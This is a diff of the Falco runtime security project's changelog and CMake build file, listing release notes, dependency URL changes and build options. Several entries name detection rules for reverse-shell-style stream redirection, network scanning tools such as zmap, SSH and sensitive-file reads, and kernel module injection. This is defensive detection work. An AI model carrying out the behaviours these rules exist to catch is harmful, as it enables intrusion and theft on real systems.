+* build: falcosecurity/falco:master also available on the AWS ECR Public registry [[#1512](https://github.com/falcosecurity/falco/pull/1512)] - [@leodido](https://github.com/leodido)
+* build: falcosecurity/falco:latest also available on the AWS ECR Public registry [[#1512](https://github.com/falcosecurity/falco/pull/1512)] - [@leodido](https://github.com/leodido)
+* update: gRPC clients can now subscribe to drop alerts via gRCP API [[#1451](https://github.com/falcosecurity/falco/pull/1451)] - [@leogr](https://github.com/leogr)
+* macro(allowed_k8s_users): exclude cloud-controller-manage to avoid false positives on k3s [[#1444](https://github.com/falcosecurity/falco/pull/1444)] - [@fntlnz](https://github.com/fntlnz)
+
+
+### Bug Fixes
+
+* fix(userspace/falco): use given priority in falco_outputs::handle_msg() [[#1450](https://github.com/falcosecurity/falco/pull/1450)] - [@leogr](https://github.com/leogr)
+* fix(userspace/engine): free formatters, if any [[#1447](https://github.com/falcosecurity/falco/pull/1447)] - [@leogr](https://github.com/leogr)
+* fix(scripts/falco-driver-loader): lsmod usage [[#1474](https://github.com/falcosecurity/falco/pull/1474)] - [@dnwe](https://github.com/dnwe)
+* fix: a bug that prevents Falco driver to be consumed by many Falco instances in some circumstances [[#1485](https://github.com/falcosecurity/falco/pull/1485)] - [@leodido](https://github.com/leodido)
+* fix: set `HOST_ROOT=/host` environment variable for the `falcosecurity/falco-no-driver` container image by default [[#1492](https://github.com/falcosecurity/falco/pull/1492)] - [@leogr](https://github.com/leogr)
+
+
+### Rule Changes
+
+* rule(list user_known_change_thread_namespace_binaries): add crio and multus to the list [[#1501](https://github.com/falcosecurity/falco/pull/1501)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(Container Run as Root User): new rule created [[#1500](https://github.com/falcosecurity/falco/pull/1500)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(Linux Kernel Module injection detected): adds a new rule that detects when an LKM module is injected using `insmod` from a container (typically used by rootkits looking to obfuscate their behavior via kernel hooking). [[#1478](https://github.com/falcosecurity/falco/pull/1478)] - [@d1vious](https://github.com/d1vious)
+* rule(macro multipath_writing_conf): create and use the macro [[#1475](https://github.com/falcosecurity/falco/pull/1475)] - [@nmarier-coveo](https://github.com/nmarier-coveo)
+* rule(list falco_privileged_images): add calico/node without registry prefix to prevent false positive alerts [[#1457](https://github.com/falcosecurity/falco/pull/1457)] - [@czunker](https://github.com/czunker)
+* rule(Full K8s Administrative Access): use the right list of admin users (fix) [[#1454](https://github.com/falcosecurity/falco/pull/1454)] - [@mstemm](https://github.com/mstemm)
+
+
+### Non user-facing changes
+
+* chore(cmake): remove unnecessary whitespace patch [[#1522](https://github.com/falcosecurity/falco/pull/1522)] - [@leogr](https://github.com/leogr)
+* remove stale bot in favor of the new lifecycle bot [[#1490](https://github.com/falcosecurity/falco/pull/1490)] - [@leodido](https://github.com/leodido)
+* chore(cmake): mark some variables as advanced [[#1496](https://github.com/falcosecurity/falco/pull/1496)] - [@deepskyblue86](https://github.com/deepskyblue86)
+* chore(cmake/modules): avoid useless rebuild [[#1495](https://github.com/falcosecurity/falco/pull/1495)] - [@deepskyblue86](https://github.com/deepskyblue86)
+* build: BUILD_BYPRODUCTS for civetweb [[#1489](https://github.com/falcosecurity/falco/pull/1489)] - [@fntlnz](https://github.com/fntlnz)
+* build: remove duplicate item from FALCO_SOURCES [[#1480](https://github.com/falcosecurity/falco/pull/1480)] - [@leodido](https://github.com/leodido)
+* build: make our integration tests report clear steps for CircleCI UI [[#1473](https://github.com/falcosecurity/falco/pull/1473)] - [@fntlnz](https://github.com/fntlnz)
+* further improvements outputs impl.  [[#1443](https://github.com/falcosecurity/falco/pull/1443)] - [@leogr](https://github.com/leogr)
+* fix(test): make integration tests properly fail [[#1439](https://github.com/falcosecurity/falco/pull/1439)] - [@leogr](https://github.com/leogr)
+* Falco outputs refactoring [[#1412](https://github.com/falcosecurity/falco/pull/1412)] - [@leogr](https://github.com/leogr)
+
+
+
+## v0.26.2
+
+Released on 2020-11-10
+
+### Major Changes
+
+* update: DRIVERS_REPO now defaults to https://download.falco.org/driver [[#1460](https://github.com/falcosecurity/falco/pull/1460)] - [@leodido](https://github.com/leodido)
+
+## v0.26.1
+
+Released on 2020-10-01
+
+### Major Changes
+
+* new: CLI flag `--alternate-lua-dir` to load Lua files from arbitrary paths [[#1419](https://github.com/falcosecurity/falco/pull/1419)] - [@admiral0](https://github.com/admiral0)
+
+
+### Rule Changes
+
+* rule(Delete or rename shell history): fix warnings/FPs + container teardown [[#1423](https://github.com/falcosecurity/falco/pull/1423)] - [@mstemm](https://github.com/mstemm)
+* rule(Write below root): ensure proc_name_exists too [[#1423](https://github.com/falcosecurity/falco/pull/1423)] - [@mstemm](https://github.com/mstemm)
+
+
+## v0.26.0
+
+Released on 2020-24-09
+
+### Major Changes
+
+* new: address several sources of FPs, primarily from GKE environments. [[#1372](https://github.com/falcosecurity/falco/pull/1372)] - [@mstemm](https://github.com/mstemm)
+* new: driver updated to 2aa88dcf6243982697811df4c1b484bcbe9488a2 [[#1410](https://github.com/falcosecurity/falco/pull/1410)] - [@leogr](https://github.com/leogr)
+* new(scripts/falco-driver-loader): detect and try to build the Falco kernel module driver using different GCC versions available in the current environment. [[#1408](https://github.com/falcosecurity/falco/pull/1408)] - [@fntlnz](https://github.com/fntlnz)
+* new: tgz (tarball) containing the statically-linked (musl) binary of Falco is now automatically built and published on bintray [[#1377](https://github.com/falcosecurity/falco/pull/1377)] - [@leogr](https://github.com/leogr)
+
+
+### Minor Changes
+
+* update: bump Falco engine version to 7 [[#1381](https://github.com/falcosecurity/falco/pull/1381)] - [@leogr](https://github.com/leogr)
+* update: the required_engine_version is now on by default [[#1381](https://github.com/falcosecurity/falco/pull/1381)] - [@leogr](https://github.com/leogr)
+* update: falcosecurity/falco-no-driver image now uses the statically-linked Falco [[#1377](https://github.com/falcosecurity/falco/pull/1377)] - [@leogr](https://github.com/leogr)
+* docs(proposals): artifacts storage [[#1375](https://github.com/falcosecurity/falco/pull/1375)] - [@leodido](https://github.com/leodido)
+* docs(proposals): artifacts cleanup [[#1375](https://github.com/falcosecurity/falco/pull/1375)] - [@leodido](https://github.com/leodido)
+
+
+### Rule Changes
+
+* rule(macro inbound_outbound): add brackets to disambiguate operator precedence [[#1373](https://github.com/falcosecurity/falco/pull/1373)] - [@ldegio](https://github.com/ldegio)
+* rule(macro redis_writing_conf): add brackets to disambiguate operator precedence [[#1373](https://github.com/falcosecurity/falco/pull/1373)] - [@ldegio](https://github.com/ldegio)
+* rule(macro run_by_foreman): add brackets to disambiguate operator precedence [[#1373](https://github.com/falcosecurity/falco/pull/1373)] - [@ldegio](https://github.com/ldegio)
+* rule(macro consider_packet_socket_communication): enable "Packet socket created in container" rule by default. [[#1402](https://github.com/falcosecurity/falco/pull/1402)] - [@rung](https://github.com/rung)
+* rule(Delete or rename shell history): skip docker overlay filesystems when considering bash history [[#1393](https://github.com/falcosecurity/falco/pull/1393)] - [@mstemm](https://github.com/mstemm)
+* rule(Disallowed K8s User): quote colons in user names [[#1393](https://github.com/falcosecurity/falco/pull/1393)] - [@mstemm](https://github.com/mstemm)
+* rule(macro falco_sensitive_mount_containers): Adds a trailing slash to avoid repo naming issues [[#1394](https://github.com/falcosecurity/falco/pull/1394)] - [@bgeesaman](https://github.com/bgeesaman)
+* rule: adds user.loginuid to the default Falco rules that also contain user.name [[#1369](https://github.com/falcosecurity/falco/pull/1369)] - [@csschwe](https://github.com/csschwe)
+
+## v0.25.0
+
+Released on 2020-08-25
+
+### Major Changes
+
+* new(userspace/falco): print the Falco and driver versions at the very beginning of the output. [[#1303](https://github.com/falcosecurity/falco/pull/1303)] - [@leogr](https://github.com/leogr)
+* new: libyaml is now bundled in the release process. Users can now avoid installing libyaml directly when getting Falco from the official release. [[#1252](https://github.com/falcosecurity/falco/pull/1252)] - [@fntlnz](https://github.com/fntlnz)
+
+
+### Minor Changes
+
+* docs(test): step-by-step instructions to run integration tests locally [[#1313](https://github.com/falcosecurity/falco/pull/1313)] - [@leodido](https://github.com/leodido)
+* update: renameat2 syscall support [[#1355](https://github.com/falcosecurity/falco/pull/1355)] - [@fntlnz](https://github.com/fntlnz)
+* update: support for 5.8.x kernels [[#1355](https://github.com/falcosecurity/falco/pull/1355)] - [@fntlnz](https://github.com/fntlnz)
+
+
+### Bug Fixes
+
+* fix(userspace/falco): correct the fallback mechanism for loading the kernel module [[#1366](https://github.com/falcosecurity/falco/pull/1366)] - [@leogr](https://github.com/leogr)
+* fix(falco-driver-loader): script crashing when using arguments [[#1330](https://github.com/falcosecurity/falco/pull/1330)] - [@antoinedeschenes](https://github.com/antoinedeschenes)
+
+
+### Rule Changes
+
+* rule(macro user_trusted_containers): add `sysdig/node-image-analyzer` and `sysdig/agent-slim` [[#1321](https://github.com/falcosecurity/falco/pull/1321)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro falco_privileged_images): add `docker.io/falcosecurity/falco` [[#1326](https://github.com/falcosecurity/falco/pull/1326)] - [@nvanheuverzwijn](https://github.com/nvanheuverzwijn)
+* rule(EphemeralContainers Created): add new rule to detect ephemeral container created [[#1339](https://github.com/falcosecurity/falco/pull/1339)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro user_read_sensitive_file_containers): replace endswiths with exact image repo name [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro user_trusted_containers): replace endswiths with exact image repo name [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro user_privileged_containers): replace endswiths with exact image repo name [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro trusted_images_query_miner_domain_dns): replace endswiths with exact image repo name [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro falco_privileged_containers): append "/" to quay.io/sysdig [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(list falco_privileged_images): add images docker.io/sysdig/agent-slim and docker.io/sysdig/node-image-analyzer [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(list falco_sensitive_mount_images): add image docker.io/sysdig/agent-slim [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(list k8s_containers): prepend docker.io to images [[#1349](https://github.com/falcosecurity/falco/pull/1349)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(macro exe_running_docker_save): add better support for centos [[#1350](https://github.com/falcosecurity/falco/pull/1350)] - [@admiral0](https://github.com/admiral0)
+* rule(macro rename): add `renameat2` syscall [[#1359](https://github.com/falcosecurity/falco/pull/1359)] - [@leogr](https://github.com/leogr)
+* rule(Read sensitive file untrusted): add trusted images into whitelist [[#1327](https://github.com/falcosecurity/falco/pull/1327)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(Pod Created in Kube Namespace): add new list k8s_image_list as white list [[#1336](https://github.com/falcosecurity/falco/pull/1336)] - [@Kaizhe](https://github.com/Kaizhe)
+* rule(list allowed_k8s_users): add "kubernetes-admin" user [[#1323](https://github.com/falcosecurity/falco/pull/1323)] - [@leogr](https://github.com/leogr)
+
+## v0.24.0
+
+Released on 2020-07-16
+
+### Major Changes
+
+* new: Falco now supports userspace instrumentation with the -u flag [[#1195](https://github.com/falcosecurity/falco/pull/1195)]
+* BREAKING CHANGE: --stats_interval is now --stats-interval [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
+* new: auto threadiness for gRPC server [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
+* BREAKING CHANGE: server streaming gRPC outputs method is now `falco.outputs.service/get` [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* new: new bi-directional async streaming gRPC outputs (`falco.outputs.service/sub`)  [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* new: unix socket for the gRPC server [[#1217](https://github.com/falcosecurity/falco/pull/1217)]
+
+
+### Minor Changes
+
+* update: driver version is 85c88952b018fdbce2464222c3303229f5bfcfad now [[#1305](https://github.com/falcosecurity/falco/pull/1305)]
+* update: `SKIP_MODULE_LOAD` renamed to `SKIP_DRIVER_LOADER` [[#1297](https://github.com/falcosecurity/falco/pull/1297)]
+* docs: add leogr to OWNERS [[#1300](https://github.com/falcosecurity/falco/pull/1300)]
+* update: default threadiness to 0 ("auto" behavior) [[#1271](https://github.com/falcosecurity/falco/pull/1271)]
+* update: k8s audit endpoint now defaults to /k8s-audit everywhere [[#1292](https://github.com/falcosecurity/falco/pull/1292)]
+* update(falco.yaml): `webserver.k8s_audit_endpoint` default value changed from `/k8s_audit` to `/k8s-audit` [[#1261](https://github.com/falcosecurity/falco/pull/1261)]
+* docs(test): instructions to run regression test suites locally [[#1234](https://github.com/falcosecurity/falco/pull/1234)]
+
+
+### Bug Fixes
+
+* fix: --stats-interval correctly accepts values >= 999 (ms) [[#1308](https://github.com/falcosecurity/falco/pull/1308)]
+* fix: make the eBPF driver build work on CentOS 8 [[#1301](https://github.com/falcosecurity/falco/pull/1301)]
+* fix(userspace/falco): correct options handling for `buffered_output: false` which was not honored for the `stdout` output [[#1296](https://github.com/falcosecurity/falco/pull/1296)]
+* fix(userspace/falco): honor -M also when using a trace file [[#1245](https://github.com/falcosecurity/falco/pull/1245)]
+* fix: high CPU usage when using server streaming gRPC outputs [[#1241](https://github.com/falcosecurity/falco/pull/1241)]
+* fix: missing newline from some log messages (eg., token bucket depleted) [[#1257](https://github.com/falcosecurity/falco/pull/1257)]
+
+
+### Rule Changes
+
+* rule(Container Drift Detected (chmod)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
+* rule(Container Drift Detected (open+create)): disabled by default [[#1316](https://github.com/falcosecurity/falco/pull/1316)]
+* rule(Write below etc): allow snapd to write its unit files [[#1289](https://github.com/falcosecurity/falco/pull/1289)]
+* rule(macro remote_file_copy_procs): fix reference to remote_file_copy_binaries [[#1224](https://github.com/falcosecurity/falco/pull/1224)]
+* rule(list allowed_k8s_users): whitelisted kube-apiserver-healthcheck user created by kops >= 1.17.0 for the kube-apiserver-healthcheck sidecar [[#1286](https://github.com/falcosecurity/falco/pull/1286)]
+* rule(Change thread namespace): Allow `protokube`, `dockerd`, `tini` and `aws` binaries to change thread namespace. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
+* rule(macro exe_running_docker_save): to filter out cmdlines containing `/var/run/docker`. [[#1222](https://github.com/falcosecurity/falco/pull/1222)]
+* rule(macro user_known_cron_jobs): new macro to be overridden to list known cron jobs   [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Schedule Cron Jobs): exclude known cron jobs  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_update_package_registry): new macro to be overridden to list known package registry update  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Update Package Registry): exclude known package registry update [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_read_ssh_information_activities): new macro to be overridden to list known activities that read SSH info  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read ssh information): do not throw for activities known to read SSH info [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_read_sensitive_files_activities): new macro to be overridden to list activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read sensitive file trusted after startup): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Read sensitive file untrusted): do not throw for activities known to read sensitive files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_write_rpm_database_activities): new macro to be overridden to list activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Write below rpm database): do not throw for activities known to write RPM database [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_db_spawned_processes): new macro to be overridden to list processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(DB program spawned process): do not throw for processes known to spawn DB [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_modify_bin_dir_activities): new macro to be overridden to list activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Modify binary dirs): do not throw for activities known to modify bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_mkdir_bin_dir_activities): new macro to be overridden to list activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Mkdir binary dirs): do not throw for activities known to create directories below bin directories [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_system_user_login): new macro to exclude known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(System user interactive): do not throw for known system user logins [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_user_management_activities): new macro to be overridden to list activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(User mgmt binaries): do not throw for activities known to do user managements activities [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_create_files_below_dev_activities): new macro to be overridden to list activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create files below dev): do not throw for activities known to create files below dev [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_contact_k8s_api_server_activities): new macro to be overridden to list activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Contact K8S API Server From Container): do not throw for activities known to contact Kubernetes API server [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_network_tool_activities): new macro to be overridden to list activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Launch Suspicious Network Tool in Container): do not throw for activities known to spawn/use network tools [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_remove_data_activities): new macro to be overridden to list activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Remove Bulk Data from Disk): do not throw for activities known to perform data remove commands [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_create_hidden_file_activities): new macro to be overridden to list activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create Hidden Files or Directories): do not throw for activities known to create hidden files [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_stand_streams_redirect_activities): new macro to be overridden to list activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): do not throw for activities known to redirect stream to network connection (in containers) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_container_drift_activities): new macro to be overridden to list activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Container Drift Detected (chmod)): do not throw for activities known to give execution permissions to files in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Container Drift Detected (open+create)): do not throw for activities known to create executables in containers [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_node_port_service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Create NodePort Service): do not throw for services known to start with a NopePort service type (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro user_known_exec_pod_activities): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Attach/Exec Pod): do not throw for activities known to attach/exec to a pod (k8s) [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro trusted_pod): defines trusted pods by an image list  [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Pod Created in Kube Namespace): do not throw for trusted pods [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(macro trusted_sa): define trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(Service Account Created in Kube Namespace): do not throw for trusted ServiceAccount [[#1294](https://github.com/falcosecurity/falco/pull/1294)]
+* rule(list network_tool_binaries): add zmap to the list [[#1284](https://github.com/falcosecurity/falco/pull/1284)]
+* rule(macro root_dir): correct macro to exactly match the `/root` dir and not other with just `/root` as a prefix [[#1279](https://github.com/falcosecurity/falco/pull/1279)]
+* rule(macro user_expected_terminal_shell_in_container_conditions): allow whitelisting terminals in containers under specific conditions [[#1154](https://github.com/falcosecurity/falco/pull/1154)]
+* rule(macro user_known_write_below_binary_dir_activities): allow writing to a binary dir in some conditions [[#1260](https://github.com/falcosecurity/falco/pull/1260)]
+* rule(macro trusted_logging_images): Add addl fluentd image [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro trusted_logging_images): Let azure-npm image write to /var/log [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro lvprogs_writing_conf): Add lvs as a lvm program [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(macro user_known_k8s_client_container): Allow hcp-tunnelfront to run kubectl in containers [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(list allowed_k8s_users): Add vertical pod autoscaler as known k8s users [[#1230](https://github.com/falcosecurity/falco/pull/1230)]
+* rule(Anonymous Request Allowed): update to checking auth decision equals to allow [[#1267](https://github.com/falcosecurity/falco/pull/1267)]
+* rule(Container Drift Detected (chmod)): new rule to detect if an existing file get exec permissions in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
+* rule(Container Drift Detected (open+create)): new rule to detect if a new file with execution permission is created in a container [[#1254](https://github.com/falcosecurity/falco/pull/1254)]
+* rule(Mkdir binary dirs): correct condition in macro `bin_dir_mkdir` to catch `mkdirat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(Modify binary dirs): correct condition in macro `bin_dir_rename` to catch `rename`, `renameat`, and `unlinkat` syscalls [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(Create files below dev): correct condition to catch `openat` syscall [[#1250](https://github.com/falcosecurity/falco/pull/1250)]
+* rule(macro user_known_set_setuid_or_setgid_bit_conditions): create macro [[#1213](https://github.com/falcosecurity/falco/pull/1213)]
+
+## v0.23.0
+
+Released on 2020-05-18
+
+### Major Changes
+
+* BREAKING CHANGE: the falco-driver-loader script now references `falco-probe.o` and `falco-probe.ko` as `falco.o` and `falco.ko` [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
+* BREAKING CHANGE: the `falco-driver-loader` script environment variable to use a custom repository to download drivers now uses the `DRIVERS_REPO` environment variable instead of `DRIVER_LOOKUP_URL`. This variable must contain the parent URI containing the following directory structure `/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]`. e.g: [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
+* new(scripts): options and command-line usage for `falco-driver-loader` [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
+* new: ability to specify exact matches when adding rules to Falco engine (only API) [[#1185](https://github.com/falcosecurity/falco/pull/1185)]
+* new(docker): add an image that wraps the `falco-driver-loader` with the toolchain [[#1192](https://github.com/falcosecurity/falco/pull/1192)]
+* new(docker): add `falcosecurity/falco-no-driver` image [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
+
+
+### Minor Changes
+
+* update(scripts): improve `falco-driver-loader` output messages [[#1200](https://github.com/falcosecurity/falco/pull/1200)]
+* update: containers look for prebuilt drivers on the Drivers Build Grid [[#1158](https://github.com/falcosecurity/falco/pull/1158)]
+* update: driver version bump to 96bd9bc560f67742738eb7255aeb4d03046b8045 [[#1190](https://github.com/falcosecurity/falco/pull/1190)]
+* update(docker): now `falcosecurity/falco:slim-*` alias to `falcosecurity/falco-no-driver:*` [[#1205](https://github.com/falcosecurity/falco/pull/1205)]
+* docs: instructions to run unit tests [[#1199](https://github.com/falcosecurity/falco/pull/1199)]
+* docs(examples): move `/examples` to `contrib` repo [[#1191](https://github.com/falcosecurity/falco/pull/1191)]
+* update(docker): remove `minimal` image [[#1196](https://github.com/falcosecurity/falco/pull/1196)]
+* update(integration): move `/integrations` to `contrib` repo [[#1157](https://github.com/falcosecurity/falco/pull/1157)]
+* https://dl.bintray.com/driver/$driver_version$/falco_$target$_$kernelrelease$_$kernelversion$.[ko|o]` [[#1160](https://github.com/falcosecurity/falco/pull/1160)]
+* update(docker/event-generator): remove the event-generator from Falco repository [[#1156](https://github.com/falcosecurity/falco/pull/1156)]
+* docs(examples): set audit level to metadata for object secrets [[#1153](https://github.com/falcosecurity/falco/pull/1153)]
+
+
+### Bug Fixes
+
+* fix(scripts): upstream files (prebuilt drivers) for the generic Ubuntu kernel contains "ubuntu-generic" [[#1212](https://github.com/falcosecurity/falco/pull/1212)]
+* fix: support Falco driver on Linux kernels 5.6.y [[#1174](https://github.com/falcosecurity/falco/pull/1174)]
+
+
+### Rule Changes
+
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): correct rule name as per rules naming convention [[#1164](https://github.com/falcosecurity/falco/pull/1164)]
+* rule(Redirect STDOUT/STDIN to Network Connection in Container): new rule to detect Redirect stdout/stdin to network connection in container [[#1152](https://github.com/falcosecurity/falco/pull/1152)]
+* rule(K8s Secret Created): new rule to track the creation of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]
+* rule(K8s Secret Deleted): new rule to track the deletion of Kubernetes secrets (excluding kube-system and service account secrets) [[#1151](https://github.com/falcosecurity/falco/pull/1151)]

 ## v0.22.1

-Released on 2020-17-04
+Released on 2020-04-17

 ### Major Changes

@@ -24,7 +332,7 @@ Released on 2020-17-04

 ## v0.22.0

-Released on 2020-16-04
+Released on 2020-04-16

 ### Major Changes

--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -16,6 +16,17 @@ project(falco)

 option(USE_BUNDLED_DEPS "Bundle hard to find dependencies into the Falco binary" OFF)
 option(BUILD_WARNINGS_AS_ERRORS "Enable building with -Wextra -Werror flags" OFF)
+option(MINIMAL_BUILD "Build a minimal version of Falco, containing only the engine and basic input/output (EXPERIMENTAL)" OFF)
+option(MUSL_OPTIMIZED_BUILD "Enable if you want a musl optimized build" OFF)
+
+# We shouldn't need to set this, see https://gitlab.kitware.com/cmake/cmake/-/issues/16419
+option(EP_UPDATE_DISCONNECTED "ExternalProject update disconnected" OFF)
+if (${EP_UPDATE_DISCONNECTED})
+  set_property(
+    DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}
+    PROPERTY EP_UPDATE_DISCONNECTED TRUE)
+endif()
+

 # Elapsed time
 # set_property(GLOBAL PROPERTY RULE_LAUNCH_COMPILE "${CMAKE_COMMAND} -E time") # TODO(fntlnz, leodido): add a flag to enable this
@@ -50,7 +61,15 @@ else()
 endif()
 message(STATUS "Build type: ${CMAKE_BUILD_TYPE}")

-set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")
+if(MINIMAL_BUILD)
+  set(MINIMAL_BUILD_FLAGS "-DMINIMAL_BUILD")
+endif()
+
+if(MUSL_OPTIMIZED_BUILD)
+  set(MUSL_FLAGS "-static -Os")
+endif()
+
+set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS} ${MINIMAL_BUILD_FLAGS} ${MUSL_FLAGS}")

 if(BUILD_WARNINGS_AS_ERRORS)
  set(CMAKE_SUPPRESSED_WARNINGS
@@ -71,9 +90,9 @@ set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")
 include(GetFalcoVersion)

 set(PACKAGE_NAME "falco")
-set(PROBE_NAME "falco-probe")
+set(PROBE_NAME "falco")
 set(PROBE_DEVICE_NAME "falco")
-set(DRIVER_LOOKUP_URL "https://s3.amazonaws.com/download.draios.com")
+set(DRIVERS_REPO "https://download.falco.org/driver")
 if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
  set(CMAKE_INSTALL_PREFIX
      /usr
@@ -93,7 +112,7 @@ message(STATUS "Using bundled nlohmann-json in '${NJSON_SRC}'")
 set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
 ExternalProject_Add(
  njson
-  URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
+  URL "https://github.com/nlohmann/json/archive/v3.3.0.tar.gz"
  URL_HASH "SHA256=2fd1d207b4669a7843296c41d3b6ac5b23d00dec48dba507ba051d14564aa801"
  CONFIGURE_COMMAND ""
  BUILD_COMMAND ""
@@ -105,83 +124,31 @@ set(CURSES_NEED_NCURSES TRUE)
 find_package(Curses REQUIRED)
 message(STATUS "Found ncurses: include: ${CURSES_INCLUDE_DIR}, lib: ${CURSES_LIBRARIES}")

-# libb64
-set(B64_SRC "${PROJECT_BINARY_DIR}/b64-prefix/src/b64")
-message(STATUS "Using bundled b64 in '${B64_SRC}'")
-set(B64_INCLUDE "${B64_SRC}/include")
-set(B64_LIB "${B64_SRC}/src/libb64.a")
-ExternalProject_Add(
-  b64
-  URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
-  URL_HASH "SHA256=343d8d61c5cbe3d3407394f16a5390c06f8ff907bd8d614c16546310b689bfd3"
-  CONFIGURE_COMMAND ""
-  BUILD_COMMAND ${CMD_MAKE}
-  BUILD_IN_SOURCE 1
-  INSTALL_COMMAND "")
+# b64
+include(b64)

 # yaml-cpp
 include(yaml-cpp)

-# OpenSSL
-include(OpenSSL)
+if(NOT MINIMAL_BUILD)
